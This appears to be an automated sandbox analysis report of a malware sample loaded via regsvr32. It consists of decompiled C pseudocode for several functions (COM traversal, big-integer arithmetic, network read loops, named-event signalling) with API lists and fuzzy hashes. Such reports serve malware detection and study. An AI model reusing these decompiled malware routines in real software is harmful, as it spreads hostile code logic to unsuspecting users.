                                                  			E00C852F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0xc8d27c; // 0x41a5a8
                                                  					_t5 = _t102 + 0xc8e038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0xc8c2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0xc8d27c; // 0x41a5a8
                                                  												_t28 = _t108 + 0xc8e0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0xc8d27c; // 0x41a5a8
                                                  														_t33 = _t78 + 0xc8e078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
                                                  			}


                                                  APIs
                                                  • SysAllocString.OLEAUT32(00C8C2B0), ref: 00C85349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00C8542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C85444
                                                  • SysFreeString.OLEAUT32(?), ref: 00C85473
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 5d95dd92e84a7aab47c43fb278f6956b8f855d25f1a8250a16500eecfc84f48d
                                                  • Instruction ID: e0e462265b3f35645d19fb492089eaf2c190ba4ffe4ece70cd8ba9e4c1d1597f
                                                  • Opcode Fuzzy Hash: 5d95dd92e84a7aab47c43fb278f6956b8f855d25f1a8250a16500eecfc84f48d
                                                  • Instruction Fuzzy Hash: FE516D71D00519EFCB00EFE8C8889AEB7B9EF89705B148598E915EB320D7719D41CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00C81017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E00C8A7AA(_a16, _t92);
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
                                                  					_t97 = _t96 - _t81;
                                                  					_v12 = _t96 - _t81;
                                                  					E00C8968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00C88967(_t101,  &_v236, _a8, _t96 - _t81);
                                                  					E00C88967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                  					_t66 = E00C8968F(_t101,  &E00C8D1B0);
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E00C8968F(_a16, _a4);
                                                  						E00C81D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c);
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L00C8B0C8();
                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L00C8B0C2();
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff;
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E00C81FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E00C88B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E00C89100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(_a8 * 4 +  &E00C8D1B0) = _t66;
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
                                                  			}


                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C810C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C810DA
                                                  • memset.NTDLL ref: 00C8117A
                                                  • memset.NTDLL ref: 00C8118A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 432940a5984adbf30e27b55e5f9534f3a8dd84ff5a68b4a8cb66347a2530e863
                                                  • Instruction ID: d61d60a53cf2cb9b65b5a1c92d3288c8a8df3cdc01e33be7125d64757fbf8cc0
                                                  • Opcode Fuzzy Hash: 432940a5984adbf30e27b55e5f9534f3a8dd84ff5a68b4a8cb66347a2530e863
                                                  • Instruction Fuzzy Hash: B741E771600249AFDB10FFA8CC45BEE77B8EF44714F048529F91AA7181DB70AE49DB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00C8A9BD
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • ResetEvent.KERNEL32(?), ref: 00C8AA31
                                                  • GetLastError.KERNEL32 ref: 00C8AA54
                                                  • GetLastError.KERNEL32 ref: 00C8AAFF
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 35ded7ad7d6b2513be95ecdffe208b12ade6335e94290c972a9cd60d4fc70e94
                                                  • Instruction ID: 9d460394a716aba94811c69613b8a2e2d9886872fad810d28ff6c48971f6d185
                                                  • Opcode Fuzzy Hash: 35ded7ad7d6b2513be95ecdffe208b12ade6335e94290c972a9cd60d4fc70e94
                                                  • Instruction Fuzzy Hash: AA418E71500204BBE724AFA5DC88FAF7BBDEF49748F10492AF153D14A0E7719A44EB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E00C839BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c));
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0xc8d134() != 0) {
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0xc8d168(0, 1,  &_v12);
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E00C82049(0x1000);
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0xc8d134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) {
                                                  							L15:
                                                  							E00C89039(_v16);
                                                  							if(_t58 == 0) {
                                                  								_t58 = E00C87A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E00C81C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) {
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E00C81C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 00C839D5
                                                  • GetLastError.KERNEL32 ref: 00C839EE
                                                    • Part of subcall function 00C81C47: WaitForMultipleObjects.KERNEL32(00000002,00C8AA72,00000000,00C8AA72,?,?,?,00C8AA72,0000EA60), ref: 00C81C62
                                                  • ResetEvent.KERNEL32(?), ref: 00C83A67
                                                  • GetLastError.KERNEL32 ref: 00C83A82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: f0d0e196208624a1793a53009617e35c0259756be04702d8544110ed08a420f2
                                                  • Instruction ID: 5031b99f451327dbfa11d2d89d77c78d53ed4dcdfab3bb2dff4272335df88bca
                                                  • Opcode Fuzzy Hash: f0d0e196208624a1793a53009617e35c0259756be04702d8544110ed08a420f2
                                                  • Instruction Fuzzy Hash: C131C632600244BBCB15EBE5CC44BAE77B9AF84B68F240528E566E7190E731EB41A714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00C842EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0xc8d270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0xc8d27c; // 0x41a5a8
                                                  				_t3 = _t8 + 0xc8e862; // 0x61636f4c
                                                  				_t25 = 0;
                                                  				_t30 = E00C87A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                  					_t25 = CreateEventA(0xc8d2a8, 1, 0, _t30);
                                                  					E00C89039(_t30);
                                                  				}
                                                  				_t12 =  *0xc8d25c; // 0x4000000a
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00C8757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E00C8205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                  					_t19 =  *0xc8d0f0( *_t32, 0x20);
                                                  					if(_t19 != 0) {
                                                  						 *_t19 = 0;
                                                  						_t19 = _t19 + 2;
                                                  					}
                                                  					_t31 = E00C8A501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C87A9A: lstrlen.KERNEL32(00C823E9,00000000,00000000,00000027,00000005,00000000,00000000,00C896DA,74666F53,00000000,00C823E9,00C8D00C,?,00C823E9), ref: 00C87AD0
                                                    • Part of subcall function 00C87A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 00C87AF4
                                                    • Part of subcall function 00C87A9A: lstrcat.KERNEL32(00000000,00000000), ref: 00C87AFC
                                                  • CreateEventA.KERNEL32(00C8D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?), ref: 00C8432B
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00C83CA0,00000000,00000000,?,00000000,?,00C83CA0,?,00000001,?,?,?,?,00C86880), ref: 00C84389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?), ref: 00C843B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?,?,?,?,00C86880), ref: 00C843CF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 62fd7e75a0eb83688354d7b18f1d7335e1f7a99e131f8893471513dfdd96c3d7
                                                  • Instruction ID: fcb55bbf2d96e13b7ebdc45b55e36a22a690f3daa8ed408b212ca1e5cf9ff4e3
                                                  • Opcode Fuzzy Hash: 62fd7e75a0eb83688354d7b18f1d7335e1f7a99e131f8893471513dfdd96c3d7
                                                  • Instruction Fuzzy Hash: 3A214632500302ABC7357FA89C88B6FB7A8EB88758F150225F972DB160E770DD01879C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E00C8A0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                  				_t60 =  *0xc8d144; // 0xc8ad81
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                  						_push(0x20000013);
                                                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  						_v8 = 4;
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                  							_t58 = E00C82049(_v8 + 1);
                                                  							if(_t58 == 0) {
                                                  								_v12 = 8;
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E00C89039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                  					_t42 = E00C81C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                  			}

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00C8A0C9
                                                  • SetEvent.KERNEL32(?), ref: 00C8A0D9
                                                  • GetLastError.KERNEL32 ref: 00C8A162
                                                    • Part of subcall function 00C81C47: WaitForMultipleObjects.KERNEL32(00000002,00C8AA72,00000000,00C8AA72,?,?,?,00C8AA72,0000EA60), ref: 00C81C62
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • GetLastError.KERNEL32(00000000), ref: 00C8A197
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: e88ce6c20352dcce49ddf7f79c1046aca38273b17e52eadb1a41789e6b563822
                                                  • Instruction ID: 8f3dcd410e30d0d9e3ff458e49eaa679bfc5d0373cbad549b8f6f72c0fa745ec
                                                  • Opcode Fuzzy Hash: e88ce6c20352dcce49ddf7f79c1046aca38273b17e52eadb1a41789e6b563822
                                                  • Instruction Fuzzy Hash: 32310BB5900608EFEB20EFA5CCC4AAEBBB8EB04344F10497AE552E2551D730AA449B25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E00C83BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;
                                                  
                                                  				_t36 = __ecx;
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				_t38 = E00C89763(__ecx,  &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                  						_t16 =  &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E00C8A022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E00C8A72D(0x40,  &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				_t40 = CreateEventA(0xc8d2a8, 1, 0,  *0xc8d344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E00C88A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E00C817D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				if(_v16 != 0) {
                                                  					E00C81F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					_t39 = _a8;
                                                  					_t38 = E00C842EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00C8D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,00C86880,?,00000001,?), ref: 00C83C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C5A
